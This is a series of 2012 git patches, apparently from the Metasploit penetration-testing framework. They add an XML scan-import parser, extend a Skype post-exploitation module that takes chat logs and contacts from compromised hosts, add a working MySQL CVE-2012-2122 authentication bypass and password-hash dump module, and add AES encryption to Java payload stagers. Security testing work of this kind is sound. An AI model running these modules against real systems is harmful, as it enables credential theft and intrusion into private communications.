diff --git a/lib/rex/parser/fusionvm_nokogiri.rb b/lib/rex/parser/fusionvm_nokogiri.rb
new file mode 100644
index 0000000000..12a729ce48
--- /dev/null
+++ b/lib/rex/parser/fusionvm_nokogiri.rb
@@ -0,0 +1,108 @@
+require "rex/parser/nokogiri_doc_mixin"
+
+module Rex
+module Parser
+
+	# If Nokogiri is available, define  document class.
+	load_nokogiri && class FusionVMDocument < Nokogiri::XML::SAX::Document
+
+
+	include NokogiriDocMixin	
+
+	def start_element(name=nil,attrs=[])
+		return nil if in_tag("JobOrder")
+		attrs = normalize_attrs(attrs)
+		attrs = attr_hash(attrs)
+		@state[:current_tag][name] = true
+		case name
+		when "IPAddress"
+			thost={}
+			return nil unless attrs["IPAddress"] and attrs["HostName"]
+			thost = {
+				:host      => attrs["IPAddress"],
+				:name      => attrs["HostName"],
+				:workspace => @args[:wspace]
+			}
+			thost[:host] = attrs["IPAddress"]
+			thost[:name] = attrs["HostName"]
+			@host = db_report(:host, thost) 
+		when "OS"
+			@state[:has_text] = true
+		when "Port"
+			@service = {
+				:host   => @host,
+				:port   => attrs["Number"],
+				:state  => "open"
+			}
+		when "Service"
+			@state[:has_text] = true
+		when "Protocol"
+			@state[:has_text] = true
+		when "Exposure"
+			@vuln = {
+				:host => @host,
+				:refs => []
+			}
+		when "Title"
+			@state[:has_text] = true
+		when "Description"
+			@state[:has_text] = true	
+		when "CVE"
+			@state[:has_text] = true
+		when "References"
+			@state[:has_text] = true
+		end
+	end
+
+	def end_element(name=nil)
+		unless in_tag("JobOrder")
+			case name
+			when "OS"
+				unless @host.nil?
+					tnote = {
+						:type       => "host.os.fusionvm_fingerprint",
+						:data       => { :os => @text.strip },
+						:host       => @host,
+						:workspace  => @args[:wspace]
+					}
+					db_report(:note, tnote)
+					@host.normalize_os
+				end
+			when  "IPAdress"
+				@host = nil
+			when "Service"
+				@service[:name] = @text.strip
+			when "Protocol"
+				@service[:proto] = @text.strip.downcase
+			when "Port"
+				db_report(:service, @service)
+			when "Exposure"
+				db_report(:vuln, @vuln)
+			when "Title"
+				@vuln[:name] = @text.strip
+			when "Description"
+				@vuln[:info] = @text.strip
+			when "CVE"
+				@vuln[:refs] << "CVE-#{@text.strip}"
+			when "References"
+				unless @text.blank? 
+					@text.split(' ').each do |ref|
+						next unless ref.start_with? "http"
+						if ref =~ /MS\d{2}-\d{3}/
+							@vuln[:refs] << "MSB-#{$&}"
+						else 
+							@vuln[:refs] << "URL-#{ref.strip}" 
+						end
+					end
+				end
+			end
+		end
+		@text = nil
+		@state[:current_tag].delete name
+	end
+
+
+
+end
+end
+end
\ No newline at end of file

From a20c85a655f563ab1ec809a135d4f95004af08e4 Mon Sep 17 00:00:00 2001
From: David Maloney <DMaloney@rapid7.com>
Date: Sun, 10 Jun 2012 17:01:31 -0500
Subject: [PATCH 09/18] Remove binding.pry call

---
 lib/msf/core/db.rb | 1 -
 1 file changed, 1 deletion(-)

diff --git a/lib/msf/core/db.rb b/lib/msf/core/db.rb
index 9d53dcb299..2f882703c9 100644
--- a/lib/msf/core/db.rb
+++ b/lib/msf/core/db.rb
@@ -4403,7 +4403,6 @@ class DBManager
 			noko_args = args.dup
 			noko_args[:blacklist] = bl
 			noko_args[:wspace] = wspace
-			binding.pry
 			if block
 				yield(:parser, "Nokogiri v#{::Nokogiri::VERSION}")
 				import_nmap_noko_stream(noko_args) {|type, data| yield type,data }

From fc0dc23752a11c61c484bce03f37e0cdd13a889c Mon Sep 17 00:00:00 2001
From: David Maloney <DMaloney@rapid7.com>
Date: Sun, 10 Jun 2012 17:04:47 -0500
Subject: [PATCH 10/18] Some handling around empty elements

---
 lib/rex/parser/fusionvm_nokogiri.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/rex/parser/fusionvm_nokogiri.rb b/lib/rex/parser/fusionvm_nokogiri.rb
index 12a729ce48..b0cd12ff57 100644
--- a/lib/rex/parser/fusionvm_nokogiri.rb
+++ b/lib/rex/parser/fusionvm_nokogiri.rb
@@ -58,7 +58,7 @@ module Parser
 		unless in_tag("JobOrder")
 			case name
 			when "OS"
-				unless @host.nil?
+				unless @host.nil? or @text.blank?
 					tnote = {
 						:type       => "host.os.fusionvm_fingerprint",
 						:data       => { :os => @text.strip },

From bb80124d63ca67484c1e96cd940afe39c6a5bb1e Mon Sep 17 00:00:00 2001
From: Carlos Perez <carlos_perez@darkoperator.com>
Date: Sun, 10 Jun 2012 21:59:14 -0400
Subject: [PATCH 11/18] Added support for shell and tested on OSX 10.6 and
 10.7. Added additional session type checks.

---
 modules/post/multi/gather/skype_enum.rb | 92 ++++++++++++++++++-------
 1 file changed, 67 insertions(+), 25 deletions(-)

diff --git a/modules/post/multi/gather/skype_enum.rb b/modules/post/multi/gather/skype_enum.rb
index 4280effac0..4edb2276b0 100644
--- a/modules/post/multi/gather/skype_enum.rb
+++ b/modules/post/multi/gather/skype_enum.rb
@@ -42,8 +42,13 @@ class Metasploit3 < Msf::Post
 				'Author'        => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>'],
 				'Version'       => '$Revision$',
 				'Platform'      => [ 'windows', 'osx' ],
-				'SessionTypes'  => [ 'meterpreter' ]
+				'SessionTypes'  => [ 'meterpreter', 'shell' ]
 			))
+		register_advanced_options(
+			[
+				# Set as an advanced option since it can only be useful in shell sessions.
+				OptInt.new('TIMEOUT', [true ,'Timeout in seconds when downloading main.db on a shell session.', 90]),
+			], self.class)
 	end
 
 	# Run Method for when run command is issued
@@ -58,30 +63,48 @@ class Metasploit3 < Msf::Post
 			print_error("Failed to load sqlite3, try 'gem install sqlite3'")
 			return
 		end
-
-		if sysinfo['OS']=~ /Mac OS X/
-			# Iterate thru each user profile on as OSX System for users not in the default install
-			users = get_nonsystem_accounts.collect {|p| if p['uid'].to_i > 500; p; end }.compact
-			users.each do |p|
-				if check_skype("#{p['dir']}/Library/Application Support/", p['name'])
-					db_in_loot = download_db(p)
-					process_db(db_in_loot,p['name'])
+		
+			if (session.platform =~ /java/) || (session.platform =~ /osx/)
+				# Make sure a Java Meterpreter on anything but OSX will exit
+				if session.platform =~ /java/ and sysinfo['OS'] !~ /Mac OS X/
+					print_error("This session type and platform are not supported.")
+					return
 				end
-			end
-		else
-			# Iterate thru each user profile in a Windows System using Meterpreter Post API
-			grab_user_profiles().each do |p|
-				if check_skype(p['AppData'],p['UserName'])
-					db_in_loot = download_db(p)
-					process_db(db_in_loot,p['UserName'])
+				# Iterate thru each user profile on as OSX System for users not in the default install
+				users = get_users.collect {|p| if p['uid'].to_i > 500; p; end }.compact
+				users.each do |p|
+					if check_skype("#{p['dir']}/Library/Application Support/", p['name'])
+						db_in_loot = download_db(p)
+						# Exit if file was not successfully downloaded
+						return if db_in_loot.nil?
+						process_db(db_in_loot,p['name'])
+					end
 				end
+			elsif (session.platfom =~ /win/ and session.type =~ /meter/)
+				# Iterate thru each user profile in a Windows System using Meterpreter Post API
+				grab_user_profiles().each do |p|
+					if check_skype(p['AppData'],p['UserName'])
+						db_in_loot = download_db(p)
+						process_db(db_in_loot,p['UserName'])
+					end
+				end
+			else
+				print_error("This session type and platform are not supported.")
 			end
-		end
+		
 	end
 
 	# Check if Skype is installed. Returns true or false.
 	def check_skype(path, user)
-		session.fs.dir.foreach(path) do |dir|
+		dirs = []
+		if session.type =~ /meterpreter/
+			session.fs.dir.foreach(path) do |d|
+				dirs << d
+			end
+		else
+			dirs = cmd_exec("ls -m \"#{path}\"").split(", ")
+		end
+		dirs.each do |dir|
 			if dir =~ /Skype/
 				print_good("Skype account found for #{user}")
 				return true
@@ -93,10 +116,14 @@ class Metasploit3 < Msf::Post
 
 	# Download file using Meterpreter functionality and returns path in loot for the file
 	def download_db(profile)
-		if sysinfo['OS'] =~ /Mac OS X/
-			file = session.fs.file.search("#{profile['dir']}///Library/Application Support/Skype/","main.db",true)
+		if session.type =~ /meterpreter/
+			if sysinfo['OS'] =~ /Mac OS X/
+				file = session.fs.file.search("#{profile['dir']}/Library/Application Support/Skype/","main.db",true)
+			else
+				file = session.fs.file.search("#{profile['AppData']}\\Skype","main.db",true)
+			end
 		else
-			file = session.fs.file.search("#{profile['AppData']}\\Skype","main.db",true)
+			file = cmd_exec("mdfind","-onlyin #{profile['dir']} -name main.db").split("\n").collect {|p| if p =~ /Skype\/\w*\/main.db$/; p; end }.compact
 		end
 		
 		file_loc = store_loot("skype.config",
@@ -107,12 +134,27 @@ class Metasploit3 < Msf::Post
 			)
 
 		file.each do |db|
-			maindb = "#{db['path']}#{session.fs.file.separator}#{db['name']}"
-			print_status("Downloading #{maindb}")
-			session.fs.file.download_file(file_loc,maindb)
+			if session.type =~ /meterpreter/
+				maindb = "#{db['path']}#{session.fs.file.separator}#{db['name']}"
+				print_status("Downloading #{maindb}")
+				session.fs.file.download_file(file_loc,maindb)
+			else
+				print_status("Downloading #{db}")
+				# Giving it 1:30 minutes to download since the file could be several MB
+				maindb = cmd_exec("cat", "\"#{db}\"", datastore['TIMEOUT'])
+				if maindb.nil?
+					print_error("Could not download the file. Set the TIMEOUT option to a higher number.")
+					return
+				end
+				# Saving the content as binary so it can be used
+				output = ::File.open(file_loc, "wb")
+				maindb.each_line do |d|
+					output.puts(d)
+				end
+				output.close
+			end
 			print_good("Configuration database saved to #{file_loc}")
 		end
-
 		return file_loc
 	end
 

From d226d80919cc84aec799d344e43a58138c62d0a1 Mon Sep 17 00:00:00 2001
From: sinn3r <msfsinn3r@gmail.com>
Date: Mon, 11 Jun 2012 01:34:18 -0500
Subject: [PATCH 12/18] Make msftidy happy

---
 modules/post/multi/gather/skype_enum.rb | 26 ++++++++++++-------------
 1 file changed, 13 insertions(+), 13 deletions(-)

diff --git a/modules/post/multi/gather/skype_enum.rb b/modules/post/multi/gather/skype_enum.rb
index 4edb2276b0..4063ce464d 100644
--- a/modules/post/multi/gather/skype_enum.rb
+++ b/modules/post/multi/gather/skype_enum.rb
@@ -6,7 +6,7 @@
 # ## This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/framework/
+#   http://metasploit.com/framework/
 ##
 
 require 'msf/core'
@@ -26,11 +26,11 @@ class Metasploit3 < Msf::Post
 	include Msf::Post::Common
 	include Msf::Post::File
 	include Msf::Post::Windows::UserProfiles
-	
+
 	include Msf::Post::OSX::System
 
-	
-	
+
+
 	def initialize(info={})
 		super( update_info( info,
 				'Name'          => 'Multi Gather Skype User Data Enumeration',
@@ -55,7 +55,7 @@ class Metasploit3 < Msf::Post
 	def run
 		# syinfo is only on meterpreter sessions
 		print_status("Running module for Skype enumeration against #{sysinfo['Computer']}") if not sysinfo.nil?
-		
+
 		# Ensure that SQLite3 gem is installed
 		begin
 			require 'sqlite3'
@@ -63,7 +63,7 @@ class Metasploit3 < Msf::Post
 			print_error("Failed to load sqlite3, try 'gem install sqlite3'")
 			return
 		end
-		
+
 			if (session.platform =~ /java/) || (session.platform =~ /osx/)
 				# Make sure a Java Meterpreter on anything but OSX will exit
 				if session.platform =~ /java/ and sysinfo['OS'] !~ /Mac OS X/
@@ -91,7 +91,7 @@ class Metasploit3 < Msf::Post
 			else
 				print_error("This session type and platform are not supported.")
 			end
-		
+
 	end
 
 	# Check if Skype is installed. Returns true or false.
@@ -125,7 +125,7 @@ class Metasploit3 < Msf::Post
 		else
 			file = cmd_exec("mdfind","-onlyin #{profile['dir']} -name main.db").split("\n").collect {|p| if p =~ /Skype\/\w*\/main.db$/; p; end }.compact
 		end
-		
+
 		file_loc = store_loot("skype.config",
 				"binary/db",
 				session,
@@ -191,7 +191,7 @@ class Metasploit3 < Msf::Post
 		# Check if an account exists and if it does enumerate if not exit.
 		if user_rows.length > 1
 			user_info = store_loot("skype.accounts",
-						"text/plain", 
+						"text/plain",
 						session,
 						"",
 						"skype_accounts.csv",
@@ -203,14 +203,14 @@ class Metasploit3 < Msf::Post
 			print_error("No skype accounts are configured for #{user}")
 			return
 		end
-	
+
 		# Extract chat log from the database
 		print_status("Extracting chat message log")
 		cl_rows = db.execute2('SELECT "chatname", "convo_id", "author", "dialog_partner",
 					datetime("timestamp","unixepoch"), "body_xml",
 					"remote_id" FROM "Messages" WHERE type == 61;')
 		chat_log = store_loot("skype.chat",
-						"text/plain", 
+						"text/plain",
 						session,
 						"",
 						"skype_chatlog.csv",
@@ -226,7 +226,7 @@ class Metasploit3 < Msf::Post
 
 		# Extract file transfer history
 		print_status("Extracting file transfer history")
-		ft_rows = db.execute2('SELECT "partner_handle", "partner_dispname", 
+		ft_rows = db.execute2('SELECT "partner_handle", "partner_dispname",
 					datetime("starttime","unixepoch"), datetime("finishtime","unixepoch"),
 					"filepath", "filename", "filesize", "bytestransferred",
 					"convo_id", datetime("accepttime","unixepoch") FROM "Transfers";')
@@ -315,4 +315,4 @@ class Metasploit3 < Msf::Post
 			save_csv(ct_rows, contact_log)
 		end
 	end
-end
\ No newline at end of file
+end

From 59f591ac46bfc33cd9f35c7be8e636de1c4cf2e7 Mon Sep 17 00:00:00 2001
From: HD Moore <hd_moore@rapid7.com>
Date: Mon, 11 Jun 2012 01:41:14 -0500
Subject: [PATCH 13/18] Adds jcran's MySQL bruteforce and dump module for
 CVE-2012-2122

---
 .../mysql/mysql_authbypass_hashdump.rb        | 218 ++++++++++++++++++
 1 file changed, 218 insertions(+)
 create mode 100644 modules/auxiliary/scanner/mysql/mysql_authbypass_hashdump.rb

diff --git a/modules/auxiliary/scanner/mysql/mysql_authbypass_hashdump.rb b/modules/auxiliary/scanner/mysql/mysql_authbypass_hashdump.rb
new file mode 100644
index 0000000000..581b77d9e3
--- /dev/null
+++ b/modules/auxiliary/scanner/mysql/mysql_authbypass_hashdump.rb
@@ -0,0 +1,218 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+	include Msf::Exploit::Remote::MYSQL
+	include Msf::Auxiliary::Report
+
+	include Msf::Auxiliary::Scanner
+
+	def initialize
+		super(
+			'Name'           => 'MYSQL CVE-2012-2122 Authentication Bypass Password Dump',
+			'Version'        => '$Revision$',
+			'Description'    => %Q{
+					This module exploits a password bypass vulnerability in MySQL in order
+				to extract the usernames and encrypted password hashes from a MySQL server.
+				These hashes ares stored as loot for later cracking.
+			},
+			'Authors'        => [
+					'TheLightCosine <thelightcosine[at]metasploit.com>', # Original hashdump module
+					'jcran'                                              # Authentication bypass bruteforce implementation
+				],
+			'References'     => [
+					['CVE', '2012-2122']
+				],
+			'DisclosureDate' => 'Jun 09 2012',
+			'License'        => MSF_LICENSE
+		)
+
+		deregister_options('PASSWORD')
+	end
+
+
+	def run_host(ip)
+
+		# Keep track of results (successful connections)
+		results = []
+
+		# Username and password placeholders
+		username = datastore['USERNAME'] 
+		password = Rex::Text.rand_text_alpha(rand(8)+1)
+		
+		# Do an initial check to see if we can log into the server at all
+		begin
+			socket = connect(false)
+			x = ::RbMysql.connect({
+				:host           => rhost, 
+				:port           => rport, 
+				:user           => username, 
+				:password       => password, 
+				:read_timeout   => 300,
+				:write_timeout  => 300,
+				:socket         => socket
+				})
+			x.connect
+			results << x
+
+			print_good "#{rhost}:#{rport} The server accepted our first login as #{username} with a bad password"
+
+		rescue RbMysql::HostNotPrivileged
+			print_error "#{rhost}:#{rport} Unable to login from this host due to policy (may still be vulnerable)"
+			return 
+		rescue RbMysql::AccessDeniedError
+			print_good "#{rhost}:#{rport} The server allows logins, proceeding with bypass test"
+		rescue ::Interrupt
+			raise $!
+		rescue ::Exception => e
+			print_error "#{rhost}:#{rport} Error: #{e}"
+			return
+		end
+
+		# Short circuit if we already won
+		if results.length > 0
+			@mysql_handle = results.first
+			return dump_hashes
+		end
+
+
+		#
+		# Threaded login checker
+		#
+		max_threads = 16
+		cur_threads = []
+
+		# Try up to 1000 times just to be sure
+		queue   = [*(1 .. 1000)]
+
+		while(queue.length > 0)
+			while(cur_threads.length < max_threads)
+
+				# We can stop if we get a valid login
+				break if results.length > 0
+
+				# keep track of how many attempts we've made
+				item = queue.shift
+				
+				# We can stop if we reach 1000 tries
+				break if not item
+
+				
+				# Status indicator
+				print_status "#{rhost}:#{rport} Authentication bypass is #{item/10}% complete" if (item % 100) == 0
+				
+				t = Thread.new(item) do |count|
+					begin 
+						# Create our socket and make the connection
+						s = connect(false)
+						x = ::RbMysql.connect({
+							:host           => rhost, 
+							:port           => rport, 
+							:user           => username, 
+							:password       => password, 
+							:read_timeout   => 300,
+							:write_timeout  => 300,
+							:socket         => s,
+							:db             => nil
+							})
+						print_status "#{rhost}:#{rport} Successfully bypassed authentication after #{count} attempts"
+						results << x
+					rescue RbMysql::AccessDeniedError
+					rescue Exception => e
+						print_status "#{rhost}:#{rport} Thread #{count}] caught an unhandled exception: #{e}"
+					end
+				end
+
+				cur_threads << t
+
+			end
+
+			# We can stop if we get a valid login
+			break if results.length > 0
+			
+			# Add to a list of dead threads if we're finished
+			cur_threads.each_index do |ti|
+				t = cur_threads[ti]
+				if not t.alive?
+					cur_threads[ti] = nil
+				end
+			end
+
+			# Remove any dead threads from the set
+			cur_threads.delete(nil)
+
+			::IO.select(nil, nil, nil, 0.25)
+		end
+		
+		# Clean up any remaining threads
+		cur_threads.each {|x| x.kill }
+
+
+		if results.length > 0
+			print_good("#{rhost}:#{rport} Successful exploited the authentication bypass flaw, dumping hashes...")
+			@mysql_handle = results.first
+			return dump_hashes
+		end
+
+		print_error("#{rhost}:#{rport} Unable to bypass authentication, this target may not be vulnerable")
+	end
+
+	def dump_hashes
+
+		# Grabs the username and password hashes and stores them as loot
+		res = mysql_query("SELECT user,password from mysql.user")
+		if res.nil?
+			print_error("#{rhost}:#{rport} There was an error reading the MySQL User Table")
+			return
+
+		end
+
+		# Create a table to store data
+		tbl = Rex::Ui::Text::Table.new(
+			'Header'  => 'MysQL Server Hashes',
+			'Indent'   => 1,
+			'Columns' => ['Username', 'Hash']
+		)
+
+		if res.size > 0
+			res.each do |row|
+				next unless (row[0].to_s + row[1].to_s).length > 0
+				tbl << [row[0], row[1]]
+				print_good("#{rhost}:#{rport} Saving HashString as Loot: #{row[0]}:#{row[1]}")
+			end
+		end
+
+		this_service = nil
+		if framework.db and framework.db.active
+			this_service = report_service(
+				:host  => rhost,
+				:port => rport,
+				:name => 'mysql',
+				:proto => 'tcp'
+			)
+		end
+
+		report_hashes(tbl.to_csv, this_service) unless tbl.rows.empty?
+
+	end
+
+	# Stores the Hash Table as Loot for Later Cracking
+	def report_hashes(hash_loot,service)
+		filename= "#{rhost}-#{rport}_mysqlhashes.txt"
+		path = store_loot("mysql.hashes", "text/plain", rhost, hash_loot, filename, "MySQL Hashes", service)
+		print_status("#{rhost}:#{rport} Hash Table has been saved: #{path}")
+
+	end
+
+end

From 02a5dff51f71a5930741bfbbddb09b4e6a9257fb Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan.vazquez@metasploit.com>
Date: Mon, 11 Jun 2012 12:07:38 +0200
Subject: [PATCH 14/18] struts_code_exec_exception_delegator_on_new_session:
 on_new_session modified

---
 .../struts_code_exec_exception_delegator.rb   | 23 ++++++++++++++-----
 1 file changed, 17 insertions(+), 6 deletions(-)

diff --git a/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb b/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb
index ad013800aa..cd732eb105 100644
--- a/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb
+++ b/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb
@@ -167,13 +167,24 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def on_new_session(client)
-		if target['Platform'] == 'linux'
-			print_status("Deleting #{@payload_exe} payload file")
-			execute_command("/bin/sh@-c@rm #{@payload_exe}")
-		else
-			print_status("Windows does not allow running executables to be deleted")
-			print_status("Delete the #{@payload_exe} file manually after migrating")
+
+		if client.type != "meterpreter"
+			print_error("Please use a meterpreter payload in order to automatically cleanup.")
+			print_error("The #{@payload_exe} file must be removed manually.")
+			return
 		end
+
+		client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")
+
+		if client.sys.config.sysinfo["OS"] =~ /Windows/
+			print_error("Windows does not allow running executables to be deleted")
+			print_error("The #{@payload_exe} file must be removed manually after migrating")
+			return
+		end
+
+		print_status("Deleting the #{@payload_exe} file")
+		client.fs.file.rm(@payload_exe)
+
 	end
 
 	def exploit

From 34ecc7fd184b8db9fd300998733fc44014d62f75 Mon Sep 17 00:00:00 2001
From: Michael Schierl <schierlm@gmx.de>
Date: Mon, 11 Jun 2012 16:13:25 -0500
Subject: [PATCH 15/18] Adding @schierlm 's AES encryption for Java

Tested with and without AES, works as advertised. Set an AESPassword,
get encryptification. Score.

Squashed commit of the following:

commit cca6c5c36ca51d585b8d2fd0840ba34776bc0668
Author: Michael Schierl <schierlm@gmx.de>
Date:   Wed Apr 4 00:45:24 2012 +0200

    Do not break other architectures
    even when using `setg AESPassword`

commit 422d1e341b3865b02591d4c135427903c8da8ac5
Author: Michael Schierl <schierlm@gmx.de>
Date:   Tue Apr 3 21:50:42 2012 +0200

    binaries

commit 27368b5675222cc1730ac22e4b7a387b88d0d2b3
Author: Michael Schierl <schierlm@gmx.de>
Date:   Tue Apr 3 21:49:10 2012 +0200

    Add AES support to Java stager

    This is compatible to the AES mode of the JavaPayload project.

    I'm pretty sure the way I did it in the handlers (Rex::Socket::tcp_socket_pair())
    is not the supposed way, but it works :-)
---
 data/java/metasploit/AESEncryption.class      | Bin 0 -> 1462 bytes
 data/java/metasploit/Payload.class            | Bin 8909 -> 9409 bytes
 .../src/metasploit/AESEncryption.java         |  42 +++++++++++++++
 .../javapayload/src/metasploit/Payload.java   |  12 +++++
 lib/msf/core/handler/bind_tcp.rb              |  49 +++++++++++++++++-
 lib/msf/core/handler/reverse_tcp.rb           |  47 ++++++++++++++++-
 modules/payloads/stagers/java/bind_tcp.rb     |  10 ++++
 modules/payloads/stagers/java/reverse_tcp.rb  |  10 ++++
 8 files changed, 168 insertions(+), 2 deletions(-)
 create mode 100644 data/java/metasploit/AESEncryption.class
 create mode 100644 external/source/javapayload/src/metasploit/AESEncryption.java

diff --git a/data/java/metasploit/AESEncryption.class b/data/java/metasploit/AESEncryption.class
new file mode 100644
index 0000000000000000000000000000000000000000..11e0a959a1e347fbd7b1ab932a6aafef160030d2
GIT binary patch
literal 1462
zcmZ`(>2lIg6#i~YxFL<&Vzo`xYF)vKabLi#t3~Z%af@}FiEyQHXkf@i%R@P%e?Ucj
z03XWn+|VM$%8!%eobT-4;n(kPKhcjAUKtp{Nsdzn`fyr_GaLy68cr&aG;kJ^N}N-+
zl#cTTY+NvK5tr24WgS-xT*Wnx>pE^27{X1Cw1Ht{l>QdSZH_wzMsb(po`Eq;aZEEr
zZ+X5a?=bWylFt|-Gv$I{82C_iD>+#e?nc0{nt1fieec>{+0Ocvnrs^~9p!RO_G(M6
zU$hD5`Nd3ft&I$I%WvL^yv#5dbDMclkzUykIA%;7!8pUncAi;Rx?Q=HdDg@n<{8F9
zOd#^LsweAqPQ8d#*DsVeOx(u;N7lpxESPwRaTAZQK+P@AUgcOcv4mxg6%&uKY9fax
z4DqSCoINu?eZyWVuegN*Rm|~JA!!^(Rjy4tU#(YU*$yfqukuxed?@NU`l86>uBv;^
zF!3)q`+mi(x*I}@s)8#Z)%5}n!(iA(*Gw43cLbR6D(j-!GlZADHMLRQ8&FBs7)B|p
z8&pbVPuf)DoF6tp<7U|ZH+5$T<goje6)QLqp^)`u$dW8W%om$-x-JEgLrbhpE6i{h
zlqk|&3z<LAmWWZ>+fpr9Cs!3}zE&#L84iUmolP!^AaILf)+>sDQVkS^%=&?J{XF?!
z+^TK|vD&=aJpfUxYs76TGUya^tMEu7xuy=Fu$3>W8c~{XJe{St2h5QCZvj0}N<2cL
zx;Vdm2kO4mwK2R-WP55SLTw#Xr=5^)Q>9{=Cb+(_gGjwlB4y_YGHM&C-Ip0A?X6eg
z&;P}D@2{QbUk6O!F#TbvUmq9|Zk*&%`Wm7qqo;PZ3HDjp5yLTp_l4%K;4nz{v4uW|
zApJ|J1|rW}(3~cs>B!*VcRj6H5ld@;Pb#TTHV_Nd(UcW!z=#igfqAZhJq_$l^Z33m
z7)<My9%*67v3NY*#QqkB9ZPHCfE8)rU>g#%Vp=aGx((5OV8rQfVbn=ku_mmXL*d4p
UNlS0yQ0`OM#&MDn>g@#Z2Z{`Yz5oCK

literal 0
HcmV?d00001

diff --git a/data/java/metasploit/Payload.class b/data/java/metasploit/Payload.class
index c8bc897506b6a4d28febbe0324bb2401f67d92c4..73a5dc55f4d78439fc0c599266e0a912726485e0 100755
GIT binary patch
delta 4494
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
